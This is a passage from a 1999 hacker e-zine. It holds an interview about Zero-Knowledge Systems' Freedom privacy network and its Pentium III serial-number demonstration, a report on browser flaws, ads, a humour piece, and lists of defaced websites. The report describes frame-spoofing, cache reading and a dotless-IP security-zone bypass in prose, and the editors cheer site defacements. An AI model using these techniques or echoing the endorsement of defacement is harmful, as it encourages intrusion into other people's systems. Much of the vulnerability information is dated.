about it and are contacting us. Since we announced the Freedom Network, we have received _many requests from ISP's around the world (many in Europe) about joining the network. It will grow as people hear about and begin using - Freedom How big is the team behind Freedom? We are 35 people here at Zero-Knowledge, including Ian Goldberg (Ian cracked the 40 bit DES code in the RSA Data Security challenge in 3.5 hours. He also cracked the GSM Cellular phone standard and the Netscape SSL). k Very impressive... He is very useful in Freedom project Yes, he is helping a lot with security. He is one of the "WiReD 25" the 25 people Wired Magazine listed as most likely to influence the future of the Internet. Pentium Serial Number (PSN) exploit So as you work on privacy, you found a way to read PSN (Pentium Serial Numbers) from computer with Pentium III chip? Yes. We realized that the software fix Intel issued to turn off the identifier, was easily compromised And you released public script that exploits that "turn off" function on PIII running computers? No. The script is not public. We posted a demonstration on our site that shows you that the identifier is not secured by the Intel patch, plus we digitally signed the demonstration so that people would know it was just ZKS demonstrating. It uses active X controls? It was written in ActiveX, yes. How were reactions from the public? We got tremendous support from the public for exposing the flaw. Ok so public reacted in positive way, but you had some problems with Intel? Yes, Intel asked Symantec to label the demonstration as a malicious virus, and they did. This brought even more support and led to the current controversy. Were you contacted by Intel directly? We had originally contacted them to tell them about the problem with the chip and ways to resolve them. We hoped that Intel would act to address these very serious privacy concerns... And then they "attacked" your exploit saying that it is malicious... Yes. So what is the current situation between ZKS and Intel? We are still trying to discuss this with Intel and we hope they will be responsive... but as of now, they don't seem ready to address the issue Well public is on your side, even hackers are on your side... Just to note that www.freedom.edu was hacked earlier today stating "sad but true, freedom is an illusion" and they told their opinions on Intel-ZKS situation. Is it? ;) The Freedom we're releasing will not be an illusion. We are thankful to have the hacker community on our side, helping us to evaluate the software and offering their suggestions in increasing its security, if need be. How much will Freedom cost? Freedom is free (the software). You have to buy tokens. We are selling them for $50 USD for a package of 5 tokens. Each one can be used to activate 1 nym on the Freedom Network for 1 year (12 months). ZKS website - http://www.zks.net BHZ bhz@net-security.org http://net-security.org @HWA 50.0 Trojan B'Gone ~~~~~~~~~~~~~ From http://www.net-security.org/ TROJAN B' GONE by BHZ, Thursday 6th May 1999 on 11:45 am CET Dark Eclipse Software, programming groups that released BackDoor trojan and AIM recover, published info about new trojan scanner. New features will be: Scan for trojans in different ways for effectiveness and speed, scan ports to see if trojans are on them, view programs loading with windows or running in the memory, monitor ports for people trying to use trojans and you could create your own trojan plugins with our plugin creator. Visit Trojan B' Gone section at link below http://216.71.96.168/des/software/tbg/index.html @HWA 51.0 The New Generation of Browsers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NEW GENERATION BROWSERS by BHZ, Thursday 6th May 1999 on 11:55 am CET Our new special report, written by Thejian, is called New Generation Browsers: Are they worth the fuzz? So you could guess, he speaks about different aspects of new-wave browsers and lists the common bugs in them. Read the Special Report below; The New Generation Browsers: Are they worth the fuzz? The general public is becoming more and more security- and, even more so, privacy-concious. Finally the realization that there's no real legitimate reason for things as the MS GUID (global unique identifier, a "feature" of the Microsoft Office package wich lets the apps MS Word and MS Excel add an id-tag to every created document wich makes it possible to trace this back to its original creator). Because of this it's not that awkward to hear the major browser-developers make claims about their browsers capabillities in this field. But are these claims justified? Previous versions of the Netscape and Opera browsers contained some serious flaws, not to mention the huge breach of security Microsofts Internet Explorer was. The purpose of this document is to explore various major flaws in the "new generation browsers" to provide the general public with the means to make a good comparison. Naturally the manufacturers of these new browsers will do everything to assure the public they got it right this time, this document will try to figure out how close to the truth these claims really are. The problems: 1. Frame-spoofing The frame-spoofing exploit allows Web sites to insert its own frames into a third-party site in the window of a surfer who visits both sites. The risk here is that an unsuspecting user who might be submitting credit card or private information to a trusted site unknowingly leaks this info to a third party. Since the discovery of this hole several variations (like the "window-spoofing" instead of "frame-spoofing" exploit). This bug has plagued all the major browsers. The problem is that these browsers allow the manipulation of frames across domains. This hole was announced patched by restricting the writing of frames to a single domain. Opera went even as far as to restrict this to pages originating from the same server. 2. "Caching" This bug allows the webmaster of a malicious site to view the contents of a users cache by utilization of Javascript. In a twist on this, it has also been proven possible by Juan Carlos Cuartango to read the contents of an users clipboard among other things. Since most users are relying heavily on "cut/paste"-functions this of course should also be considered a major security-/privacy-hole. This one also was announced patched. But.. But guess what? The new Microsoft Internet Explorer 5 still allows the frame-spoofing and reading of local files as described by G. Guninski (http://www.whitehats.com/guninski/read.html) on the Bugtraq mailinglist. And yes, Netscapes new baby is still vulnerable too. Another bug, known as the security zone bug, in IE 4 and 5 (by connecting to http://3475932041 the browsers surfs to the MS Web site, because Winsock translates the URL as an existing IP. Problem here is that the browser figures the site is within the "trusted local intranetzone" and because of this automatically submits usernames and passwords without asking for confirmation by the user) is partially fixed but this one can also still in some way or another be exploited. Opera did a pretty decent job at plugging the spoofing-hole, but that company recently discovered it still is possible to make a browser try and open up a fake frame, but in the process using the wrong adress. Patches for this problem are expected to keep the browser from opening the frame at all, but hey, there hasn't really been lived up to those expectations recently has there? The new versions of these browsers even have some nice new "features": - Microsofts Internet Explorer 5 now contains a so-called Auto-Complete function. When users begin typing in a URL, IE will suggest possible matches from sites they have recently visited. This can save a user from having to type out long URLs. It can also help people find sites they visited but did not bookmark. Problem is though, that this feature also applies to online forms. Because of this data like username/password combinations are remembered by the browser. Nice feature when you're on a shared computer eh? Advised is to turn the Auto-Complete function off. - Another nice feature of the Internet Explorer 5 is that is notifies Web sites when they get bookmarked by the user. This was an intended feature, it's supposed to help webdesigners "brand" a users bookmarks. This feature enables in short a Web site to put a logo up next to the corresponding bookmark (called "Favorites" in Internet Explorer). The browser requests a file called favicon.ico to put the image in that file next to the bookmark. While developing this function Microsoft obviously didn't think (or just plainly ignored) the privacy of their users. A site could hypothetically use the feature to build a log of a user's bookmarked pages. Visitors could be tracked anonymously, by a cookie, or by name, if they registered at the site. - Netscape has thought of something nice too. Netscape's (4.5) what's related function connects to the rl.ld1.netscape.com site at random. For every 5 sites you visit 1 connection is made to their server. This is probably to keep some stats or something, but I actually enjoy having some privacy so you might want to turn "what's related" off too. As you've probably gathered from the above, the main problem with the "new generation browsers" (as was with their predecessors) lies within the implementation of scripting languages. This got illustrated this week by the alert that the so-called "anonymizing"- services like Anonimyzer, Onion Router, Lucent Personalized Web Assistant and AIX Privacy (wich are supposed to provide their users with stealth browsing without showing any information about the users to the visited Web sites) allow sites to simply turn the anonymizing-function off by using a Javascript redirect-tag. As was noted in response to this alert, this is not a fault by the involved online services, but more one on the users side. If your privacy is truly dear to you, the best thing to do probably is turning off the Javascript, Java and AxtiveX functions in your browser. It seems that browser- manufacturers are just not ready for the use of those functions yet. It might get a tad less colourful and sparkling on the Net, but hey, privacy isn't that bad either eh? Anyone tried Lynx? Overflow-patch now availble.. Thejian for Help Net Security http://net-security.org @HWA AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * *****************************************************************************

Come.to/Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j http:/ 99 http:o http:/ login: sysadmin n99 httpi /come. password: tp://comn to/Can me.to/Cat c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h http:/ industry people to attend with booths and talks. 99 http:e /come. you could have a booth and presentation for the cost of p://comel http:/ little more than a doorprize (tba) contact us at our main n99http:i http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s http:/ for updates. This is the first Canadian event of its type invalid t 403 Fo and will have both white and black hat attendees, come out logged! ! 404 Fi and shake hands with the other side... *g* mainly have some IP locked ome.to fun and maybe do some networking (both kinds). see ya there! hostname http:/ x99http:x o/Canc x.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 Canc0n99 Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* BSOD Simulator May 4, 1999 Users of Red Hat 6.0 are discovering a new feature that hasn't been widely advertised: a Blue Screen of Death simulator. By default, the bsodsim program activates when the user hits the virtually unused SysRq key (this is customizable), causing the system to switch to a character cell console to display a ficticious Blue Screen. Red Hat hails the bsodsim program as the "boss key" for the Linux world. "Many old DOS games had a boss key, which caused the program to switch to a DOS shell or a benign looking screenshot when the boss walked by," a Red Hat engineer explained. "This allowed unscrupulous workers to play games without the knowledge of the PHB. With multitasking, this isn't necessary anymore." He continued, "However, a new 'boss problem' has emerged. Workers are smuggling Linux boxes into companies that exclusively use Windows. This is all good and well until the PHB walks by and comments, 'That doesn't look like Windows...' With bsodsim, that problem is solved. The worker can hit the emergency SysRq key, and the system will behave just like Windows..." The bsodsim program doesn't stop at just showing a simulated error message. If the boss doesn't walk away, the worker can continue the illusion by hitting CTRL-ALT-DEL, which causes a simulated reboot. After showing the usual boot messages, bsodsim will run a simulated SCANDISK program indefinitely. The boss won't be able to tell the difference. If the boss continues to hang around, the worker can say, "SCANDISK is really taking a long time... maybe we should upgrade our computers. And don't you have something better to do than watch this computer reboot for the tenth time today?" Red Hat 6.0 also includes a 'Flying Windows' screensaver for use with X Windows. If the boss happens to walk by your computer when you're away, he still won't be able to tell that it's not running Windows. --- James S. Baughn http://i-want-a-website.com/about-linux/ @HWA SITE.1 interScape.403-security.org Croatian phreaking group ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Should be online as of this release, interScape is a new phreak group that has found a home on the 403-security server. AirWalk of interScape promises an ezine with h/p articles and general security concerns along with other releases that are to appear on the website is the Phreak Bible (in Croatian) version 2.0, an impressive looking piece of work over 4M in size, expect to hear a lot from this group in coming months. The phreak bible is also available on xoom (in croatian, there is no english version planned or in the works at this time) at the following url; http://members.xoom.com/interScape/phreak01.zip @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Astral reports that DT (Dutch Threat) cracked the following sites over the weekend Anti NATO Serbian sites got hacked Astral 02.04.1999 22:18 Today 6 Yugoslavian anti NATO sites were hacked by dutchthreat with message : "www.dutchthreat.org condemns all activities againts human rights.Pro NATO, peace." Following sites were hacked : May 2nd www.pentagon.co.yu www.italsrem.co.yu www.martinart.co.yu www.carbo.co.yu www.net022.co.yu/crazy/nato.htm www.net022.co.yu/nato/index.html May 3rd Cracked www.bellsouth.com (D-Elite Crew) www.ibm-teamplayers.com (cold fusion, not Domino? :-) www.elektra.com (cold fusion) www.conted.bcc.ctc.edu (cold fusion) asi.bigsky.net www.emmsa.com (cold fusion) eforms.sjdccd.cc.ca.us www.energy.wsu.edu (cold fusion) May 4th From HNN rumours section http://www.hackernews.com/ contributed by Anonymous Cracked People still have not fixed their Cold Fusion holes. There are a smattering of .mil sites today as well. Wonder how many commanders learn about thier security breaches from HNN? http://www.pentagon.co.yu http://www.italsrem.co.yu http://www.martinart.co.yu http://www.carbo.co.yu http://www.net022.co.yu http://force21.c3sys.army.mil http://www.ett.redstone.army.mil http://bliss-usasma.army.mil http://call.army.mil http://www.wwd.net http://www.wrestlemaniacs.com http://www.centrestate.com http://www.herb.be http://www.pwr1.com http://www.shenandoah.com http://www.suite101.com http://www.galaxy-web.com http://www.1688.com http://jacwm.nac.net http://www.rotorcraft.com http://www.ulead.com.tw http://www.glynn.com http://www.gecc.com http://www.zol.ch http://www.news400.com May 6th From HNN rumours section; contributed by Anonymous Cracked Many of these government sites where reported as cracked by the group known as Foxpare. http://comms2.rdc.uscg.mil http://c4iweb.nosc.mil/ http://bigblue.od.nih.gov http://www.freedom.edu http://www.mrihsv.com http://www.queen.it http://eo1.gsfc.nasa.gov http://comms2.rdc.uscg.mil ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html hack-faq Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html Original jargon file New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ New jargon file Mirror sites: ~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.genocide2600.com/~tattooman/zines/hwahaxornews/ http://archives.projectgamma.com/zines/hwa/. International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Go there Brasil........: http://www.psynet.net/ka0z Go there http://www.elementais.cjb.net Go there Columbia......: http://www.cascabel.8m.com Go there http://www.intrusos.cjb.net Go there Indonesia.....: http://www.k-elektronik.org/index2.html Go there http://members.xoom.com/neblonica/ Go there http://hackerlink.or.id/ Go there Netherlands...: http://security.pine.nl/ Go there Russia........: http://www.tsu.ru/~eugene/ Go there Singapore.....: http://www.icepoint.com Go there Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- � 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]